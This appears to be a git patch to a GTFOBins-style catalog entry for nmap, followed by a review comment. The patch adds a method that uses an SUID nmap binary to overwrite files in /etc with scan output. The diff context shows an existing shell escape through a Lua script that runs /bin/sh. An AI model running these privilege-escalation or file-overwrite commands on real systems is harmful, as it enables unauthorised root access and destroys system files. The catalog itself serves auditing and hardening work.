From edc8a2d03da03caf8e0b698938f6c0895a395964 Mon Sep 17 00:00:00 2001 From: Syed Umar Arfeen <18597330+Anon-Exploiter@users.noreply.github.com> Date: Mon, 4 Jan 2021 12:16:29 +0500 Subject: [PATCH] Adding another usage of Nmap's SUID I came along with this method on stackoverflow while trying to execute commands using a SUID nmap binary, though `--script` failed me but this works. Could be enough to demonstrate effect of using SUID on Nmap. I've yet to come up with a way to over-write the contents of the system file according to what we want, with this we can only over-write files with nmap output. ```bash sudo touch /etc/filecantbetouched nmap 127.0.0.1 -oN=/etc/filecantbetouched cat /etc/filecantbetouched ``` --- _gtfobins/nmap.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index 7374564..0d4ccc6 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -108,4 +108,9 @@ functions: TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF ./nmap --script=$TF + - description: This will over-write files with nmap output, use with caution. + code: | + sudo touch /etc/filecantbetouched + nmap 127.0.0.1 -oN=/etc/filecantbetouched + cat /etc/filecantbetouched ---
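Review bot: the `description:` line in the hunk is less precise than the commit message; it should state what the commit message explains, namely that the written file's contents are not attacker-controlled (only Nmap's normal-format scan output is written) and that the target file's existing contents are destroyed, rather than the vague "use with caution". Suggest something like `description: This only overwrites the target file with Nmap's own output (its contents cannot be chosen); the original contents are lost.` Also `over-write` should be spelled `overwrite`, and the `sudo touch /etc/filecantbetouched` line is demonstration setup, not part of the technique (the SUID binary creates the file itself when it does not exist), so it belongs in the commit message or a comment rather than in `code:`. Finally, the hard-coded path `/etc/filecantbetouched` departs from the `$LFILE` placeholder convention used elsewhere in this file; for consistency with the existing `$TF` entry above, use `LFILE=/path/to/file` and `-oN=$LFILE`.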